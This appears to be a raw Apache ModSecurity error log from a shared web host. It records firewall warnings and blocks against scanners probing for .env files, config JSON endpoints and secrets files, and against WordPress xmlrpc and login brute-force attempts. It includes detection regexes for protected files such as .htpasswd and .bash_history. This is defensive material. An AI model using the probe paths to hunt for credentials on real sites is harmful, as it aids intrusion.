[Tue May 26 15:40:30.294040 2026] [security2:error] [pid 733610:tid 733850] [client 5.255.126.59:40516] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQtwAAAG4"], referer: https://bloggertarget.com/firebase-config.json
[Tue May 26 15:40:30.296513 2026] [security2:error] [pid 733610:tid 733757] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQtgAAABE"], referer: https://bloggertarget.com/api/v1/config
[Tue May 26 15:40:30.406781 2026] [security2:error] [pid 733610:tid 733854] [client 5.255.126.59:40524] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQvwAAAHI"], referer: https://bloggertarget.com/.well-known/jwks.json
[Tue May 26 15:40:30.417875 2026] [security2:error] [pid 733610:tid 733762] [client 5.255.126.59:40302] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQvgAAABY"], referer: https://bloggertarget.com/__env.js
[Tue May 26 15:40:30.433785 2026] [security2:error] [pid 733610:tid 733745] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQxQAAAAU"]
[Tue May 26 15:40:30.583055 2026] [security2:error] [pid 733610:tid 733758] [client 5.255.126.59:40338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ0gAAABI"], referer: https://bloggertarget.com/openapi.json
[Tue May 26 15:40:30.776183 2026] [security2:error] [pid 733610:tid 733794] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ2wAAADY"], referer: https://bloggertarget.com/api/config
[Tue May 26 15:40:30.808289 2026] [security2:error] [pid 733610:tid 733774] [client 5.255.126.59:40450] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ4AAAACI"], referer: https://bloggertarget.com/env.json
[Tue May 26 15:40:30.813774 2026] [security2:error] [pid 733610:tid 733831] [client 5.255.126.59:40384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ3gAAAFs"], referer: https://bloggertarget.com/runtime-config.js
[Tue May 26 15:40:30.826561 2026] [security2:error] [pid 733610:tid 733771] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ5QAAAB8"], referer: https://bloggertarget.com/api/v2/config
[Tue May 26 15:40:30.832065 2026] [security2:error] [pid 733610:tid 733841] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ5gAAAGU"], referer: https://bloggertarget.com/manifest.webmanifest
[Tue May 26 15:40:30.834403 2026] [security2:error] [pid 733610:tid 733787] [client 5.255.126.59:40476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ4gAAAC8"], referer: https://bloggertarget.com/config.json
[Tue May 26 15:40:30.842637 2026] [security2:error] [pid 733610:tid 733827] [client 5.255.126.59:40352] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ3wAAAFc"], referer: https://bloggertarget.com/config.js
[Tue May 26 15:40:30.976448 2026] [security2:error] [pid 733610:tid 733847] [client 5.255.126.59:40400] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ7AAAAGs"], referer: https://bloggertarget.com/app-config.json
[Tue May 26 15:40:30.981063 2026] [security2:error] [pid 733610:tid 733861] [client 5.255.126.59:40370] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ6wAAAHk"], referer: https://bloggertarget.com/__/firebase/init.json
[Tue May 26 15:40:31.323050 2026] [security2:error] [pid 733610:tid 733806] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ7wAAAEI"], referer: https://bloggertarget.com/api/env
[Tue May 26 15:40:31.346088 2026] [security2:error] [pid 733610:tid 733789] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlsLL_4PasUNKBsfQ8QAAADE"], referer: https://bloggertarget.com/health
[Tue May 26 15:40:32.456840 2026] [security2:error] [pid 733610:tid 733714] [remote 103.11.102.106:55712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVxmMLL_4PasUNKBsfRIQAAB2c"]
[Tue May 26 15:40:32.516323 2026] [security2:error] [pid 733610:tid 733756] [client 195.178.110.34:56466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVxmMLL_4PasUNKBsfRIgAAABA"]
[Tue May 26 15:40:32.672088 2026] [security2:error] [pid 733610:tid 733768] [client 195.178.110.34:56466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVxmMLL_4PasUNKBsfRKQAAABw"]
[Tue May 26 15:40:32.796543 2026] [security2:error] [pid 733610:tid 733752] [client 47.128.32.152:25962] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gciamd.org.in"] [uri "/robots.txt"] [unique_id "ahVxmMLL_4PasUNKBsfRLwAAAAw"]
[Tue May 26 15:40:33.074130 2026] [security2:error] [pid 733610:tid 733764] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxmMLL_4PasUNKBsfRKAAAABg"]
[Tue May 26 15:40:33.437093 2026] [security2:error] [pid 733610:tid 733782] [client 188.166.234.218:60240] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "pronumbers.com.au"] [uri "/wp-login.php"] [unique_id "ahVxmMLL_4PasUNKBsfRMQAAACo"]
[Tue May 26 15:40:34.176741 2026] [security2:error] [pid 733610:tid 733761] [client 136.158.2.221:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxmcLL_4PasUNKBsfRUgAAABU"]
[Tue May 26 15:40:35.180738 2026] [security2:error] [pid 733610:tid 733805] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxmsLL_4PasUNKBsfRbQAAAEE"]
[Tue May 26 15:40:36.435833 2026] [security2:error] [pid 733610:tid 733845] [client 223.123.38.127:15221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxnMLL_4PasUNKBsfRqQAAAGk"]
[Tue May 26 15:40:36.442810 2026] [security2:error] [pid 733610:tid 733845] [client 223.123.38.127:15221] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxnMLL_4PasUNKBsfRqQAAAGk"]
[Tue May 26 15:40:36.476495 2026] [security2:error] [pid 733610:tid 733807] [client 195.178.110.34:47762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/dev/.env"] [unique_id "ahVxnMLL_4PasUNKBsfRrQAAAEM"]
[Tue May 26 15:40:37.348400 2026] [security2:error] [pid 733610:tid 733844] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxnMLL_4PasUNKBsfRuQAAAGg"]
[Tue May 26 15:40:38.914047 2026] [security2:error] [pid 733610:tid 733858] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxnsLL_4PasUNKBsfR3gAAAHY"]
[Tue May 26 15:40:38.937651 2026] [security2:error] [pid 733610:tid 733845] [client 103.153.130.62:57563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxnsLL_4PasUNKBsfSEwAAAGk"]
[Tue May 26 15:40:38.937812 2026] [security2:error] [pid 733610:tid 733845] [client 103.153.130.62:57563] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxnsLL_4PasUNKBsfSEwAAAGk"]
[Tue May 26 15:40:39.907396 2026] [security2:error] [pid 733610:tid 733820] [client 114.119.146.109:24521] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.grandconclaveindia.org.in"] [uri "/robots.txt"] [unique_id "ahVxn8LL_4PasUNKBsfSOwAAAFA"]
[Tue May 26 15:40:41.463517 2026] [security2:error] [pid 733610:tid 733775] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxocLL_4PasUNKBsfSZQAAACM"]
[Tue May 26 15:40:43.635662 2026] [security2:error] [pid 733610:tid 733806] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxo8LL_4PasUNKBsfSnQAAAEI"]
[Tue May 26 15:40:44.692815 2026] [proxy:error] [pid 733610:tid 733770] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:44.692881 2026] [proxy_http:error] [pid 733610:tid 733770] [client 205.210.31.151:59720] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:44.693475 2026] [proxy:error] [pid 733610:tid 733770] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:40:44.693517 2026] [proxy_http:error] [pid 733610:tid 733770] [client 205.210.31.151:59720] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:40:45.829937 2026] [security2:error] [pid 733610:tid 733753] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxpcLL_4PasUNKBsfSzgAAAA0"]
[Tue May 26 15:40:46.500832 2026] [security2:error] [pid 733610:tid 733858] [client 195.178.110.34:47082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/dev/.env"] [unique_id "ahVxpsLL_4PasUNKBsfS4QAAAHY"]
[Tue May 26 15:40:47.848557 2026] [security2:error] [pid 733610:tid 733783] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxp8LL_4PasUNKBsfTAgAAACs"]
[Tue May 26 15:40:48.269917 2026] [security2:error] [pid 733610:tid 733762] [client 151.244.147.79:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxpsLL_4PasUNKBsfS6wAAFmE"]
[Tue May 26 15:40:49.295946 2026] [security2:error] [pid 733610:tid 733843] [client 103.153.130.62:57834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxqcLL_4PasUNKBsfTOwAAAGc"]
[Tue May 26 15:40:49.296067 2026] [security2:error] [pid 733610:tid 733843] [client 103.153.130.62:57834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxqcLL_4PasUNKBsfTOwAAAGc"]
[Tue May 26 15:40:49.421110 2026] [security2:error] [pid 733610:tid 733851] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxqcLL_4PasUNKBsfTMwAAAG8"]
[Tue May 26 15:40:51.608688 2026] [security2:error] [pid 733610:tid 733751] [client 114.119.155.228:40465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVxq8LL_4PasUNKBsfTfgAAAAs"], referer: http://haddingtonwines.com/cart?remove_item=c4819d06b0ca810d38506453cfaae9d8
[Tue May 26 15:40:51.989892 2026] [security2:error] [pid 733610:tid 733825] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxq8LL_4PasUNKBsfTfQAAAFU"]
[Tue May 26 15:40:52.937639 2026] [security2:error] [pid 733610:tid 733827] [client 195.178.110.34:33722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahVxrMLL_4PasUNKBsfTpAAAAFc"]
[Tue May 26 15:40:53.700368 2026] [security2:error] [pid 733610:tid 733829] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxrcLL_4PasUNKBsfTrAAAAFk"]
[Tue May 26 15:40:56.372913 2026] [security2:error] [pid 733610:tid 733851] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxr8LL_4PasUNKBsfT6AAAAG8"]
[Tue May 26 15:40:56.933284 2026] [security2:error] [pid 733610:tid 733615] [remote 216.73.216.30:34768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxsMLL_4PasUNKBsfUCgAAGAQ"]
[Tue May 26 15:40:57.754226 2026] [security2:error] [pid 733610:tid 733823] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxscLL_4PasUNKBsfUFQAAAFM"]
[Tue May 26 15:40:59.757720 2026] [security2:error] [pid 733610:tid 733861] [client 149.20.243.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxs8LL_4PasUNKBsfUUwAAAHk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:40:59.860166 2026] [security2:error] [pid 733610:tid 733866] [client 103.153.130.62:58102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxs8LL_4PasUNKBsfUXAAAAH4"]
[Tue May 26 15:40:59.860379 2026] [security2:error] [pid 733610:tid 733866] [client 103.153.130.62:58102] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxs8LL_4PasUNKBsfUXAAAAH4"]
[Tue May 26 15:41:00.033137 2026] [security2:error] [pid 733610:tid 733845] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxs8LL_4PasUNKBsfUTwAAAGk"]
[Tue May 26 15:41:00.077754 2026] [security2:error] [pid 733610:tid 733847] [client 185.191.171.11:54678] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/list/"] [unique_id "ahVxtMLL_4PasUNKBsfUYwAAAGs"]
[Tue May 26 15:41:00.077899 2026] [security2:error] [pid 733610:tid 733847] [client 185.191.171.11:54678] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-24-28/list/"] [unique_id "ahVxtMLL_4PasUNKBsfUYwAAAGs"]
[Tue May 26 15:41:01.194735 2026] [security2:error] [pid 733610:tid 733767] [client 149.20.243.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxtcLL_4PasUNKBsfUgwAAABs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1513913&moderation-hash=de509e43104cf1c86d4c9827f51c1570
[Tue May 26 15:41:01.933910 2026] [security2:error] [pid 733610:tid 733630] [remote 216.73.216.30:34768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxtcLL_4PasUNKBsfUmQAAIxM"]
[Tue May 26 15:41:02.122173 2026] [security2:error] [pid 733610:tid 733855] [client 14.240.11.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxtcLL_4PasUNKBsfUlQAAAHM"]
